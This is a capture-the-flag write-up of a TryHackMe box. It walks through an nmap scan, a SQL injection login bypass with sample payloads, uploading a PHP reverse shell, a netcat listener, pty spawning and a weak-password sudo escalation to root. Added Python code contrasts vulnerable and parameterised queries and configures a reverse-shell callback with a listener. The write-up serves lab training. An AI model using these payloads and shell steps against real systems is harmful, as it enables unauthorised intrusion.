This post is a write-up of the Incognito CTF beginner box on TryHackMe.
Let's get started by deploying the machine. Once it is up, start with a basic Nmap scan to see which ports and services are open on the target IP address.
nmap -sC -sV -A -T4 10.10.194.255
Port 80 is open, so let's look at the webpage first. It is the login page of an LMS (Library Management System).
Whenever I see a login page like this in a box, my first step is one of three things: try common usernames and passwords, run a dictionary attack with Hydra, or try a basic SQL injection.
This time I started with the last option, SQL injection, and got into the website with a basic payload.
After I got in, I went through the various functions looking for an injection point or other vulnerable functionality. After some exploring I found that the site was vulnerable to a file inclusion attack through the add/edit books function: it let me upload a PHP file that the server would then execute.
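To show why a basic payload gets past a login form like this one, here is an added example that is not part of the original write-up and is not the LMS's actual code. It uses a constructed SQLite table standing in for the application's users table, and puts the vulnerable query (user input pasted into the SQL text, the way a careless PHP login does it) next to the parameterised version. The two payloads, `' OR '1'='1' -- ` and `admin' -- `, are generic login-bypass strings; the write-up does not say which payload the author used.

```python
import sqlite3

# Constructed stand-in for the LMS login table: two users with plaintext
# passwords, only so the example stays short. A real application would store
# password hashes.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("librarian", "books")],
    )
    return db


def login_vulnerable(db, username: str, password: str):
    """Login check the way a vulnerable app builds it: the user-supplied
    strings are pasted straight into the SQL text, so a quote in the input
    changes the structure of the query."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    """Same check with a parameterised query: the driver sends the values
    separately from the SQL text, so input can never become SQL syntax."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Two classic login-bypass payloads typed into the username field. The
# trailing "-- " comments out the password clause; the first one also makes
# the WHERE clause always true, so the first row (admin) is returned.
BYPASS_ALWAYS_TRUE = "' OR '1'='1' -- "
BYPASS_KNOWN_USER = "admin' -- "


def demo():
    """Run both login implementations against both payloads and a legitimate login."""
    db = make_db()
    return {
        "legit_vulnerable": login_vulnerable(db, "admin", "S3cret!"),
        "bypass_vulnerable": login_vulnerable(db, BYPASS_ALWAYS_TRUE, "wrong"),
        "known_user_vulnerable": login_vulnerable(db, BYPASS_KNOWN_USER, "wrong"),
        "bypass_safe": login_safe(db, BYPASS_ALWAYS_TRUE, "wrong"),
        "known_user_safe": login_safe(db, BYPASS_KNOWN_USER, "wrong"),
        "legit_safe": login_safe(db, "admin", "S3cret!"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable function returns `admin` for both payloads without knowing any password, because the injected quote closes the string literal and `--` throws away the rest of the query. The parameterised function returns `None` for the same input and still accepts the real credentials.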
So I used Pentest Monkey's PHP reverse shell to get a shell on the box. Before uploading it, edit the $ip and $port variables near the top of the script so that they point at your attacking machine's IP and the port your listener will use; the defaults will not call back to you.
Before uploading the shell I started a netcat listener on that port:
nc -lnvp 9999
As you can see, the shell we get back is not an interactive pty, so commands like su (which needs a terminal) will not work. Spawn a pty with Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
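The reverse-shell steps above (configure the payload, start the listener, wait for the target to call back) as one added example, not code from the write-up or from Pentest Monkey. `SAMPLE_PHP` is a constructed excerpt modelled on the two settings lines at the top of php-reverse-shell.php; `open_listener` is a Python stand-in for `nc -lnvp 9999`; `_fake_target` plays the compromised web server on loopback so the whole exchange runs offline.

```python
import re
import socket
import threading

# Constructed excerpt modelled on the settings lines near the top of
# pentestmonkey's php-reverse-shell.php; the real file contains much more.
SAMPLE_PHP = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
"""


def configure_reverse_shell(php_source: str, lhost: str, lport: int) -> str:
    """Rewrite the $ip and $port assignments so the shell calls back to our
    listener. Doing it programmatically avoids the classic mistake of
    uploading the shell with the default 127.0.0.1:1234 still in place."""
    php_source, n_ip = re.subn(r"\$ip\s*=\s*'[^']*';", f"$ip = '{lhost}';", php_source, count=1)
    php_source, n_port = re.subn(r"\$port\s*=\s*\d+;", f"$port = {lport};", php_source, count=1)
    if n_ip != 1 or n_port != 1:
        raise ValueError("could not find the $ip/$port assignments in the PHP source")
    return php_source


def open_listener(host: str = "0.0.0.0", port: int = 9999) -> socket.socket:
    """Equivalent of `nc -lnvp 9999`: bind and wait for the target to connect.
    Port 0 asks the OS for any free port (used by the loopback demo below)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def catch_callback(listener: socket.socket, timeout: float = 60.0):
    """Accept one inbound connection and return (peer_ip, first_output, conn).
    A reverse shell connects *out* from the web server to us, which is why
    the listener must be running before the uploaded PHP file is triggered."""
    listener.settimeout(timeout)
    conn, peer = listener.accept()
    first_output = conn.recv(4096).decode("utf-8", errors="replace")
    return peer[0], first_output, conn


def _fake_target(port: int) -> None:
    # Constructed stand-in for the compromised web server: connect back to the
    # listener and send what a freshly spawned shell might print for `id`.
    with socket.create_connection(("127.0.0.1", port)) as c:
        c.sendall(b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n")


def demo_local():
    """Run the whole exchange on loopback: configure the payload, start the
    listener, let the fake target call back, and capture its first output."""
    listener = open_listener("127.0.0.1", 0)
    port = listener.getsockname()[1]
    payload = configure_reverse_shell(SAMPLE_PHP, "127.0.0.1", port)
    t = threading.Thread(target=_fake_target, args=(port,))
    t.start()
    peer_ip, first_output, conn = catch_callback(listener, timeout=5)
    conn.close()
    listener.close()
    t.join()
    return payload, peer_ip, first_output


if __name__ == "__main__":
    payload, peer_ip, first_output = demo_local()
    print(payload)
    print(f"connection from {peer_ip}: {first_output.strip()}")
```

Against a real target you would call `configure_reverse_shell` with your TryHackMe VPN address and 9999, upload the result through the vulnerable function, and keep `nc -lnvp 9999` (or `open_listener`) running. Once the shell lands, the pty spawn command above makes su usable; for a fully interactive terminal (tab completion, Ctrl-C that does not kill the shell) the usual follow-up is to background the shell with Ctrl-Z, run `stty raw -echo; fg` on the attacker side, and press Enter.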
With a stable pty I found the user cirius and got the user flag from there.
Initially I had trouble getting root, but the CTF author released a hint on Discord that the user cirius has a weak password. Running su cirius with the password password switched me to that user.
As cirius I ran sudo -l, which lists the commands the current user is allowed to run with sudo.
From the output we can see that cirius can run any command as root, as long as we have the password.
So let's become root (for example with sudo -i or sudo su, entering cirius's password) and get the final flag, which should be in /root.
Reading root.txt gave me the last flag and completed the box! For more writeups like this, you can click here. Many more writeups of the Incognito CTF are coming soon.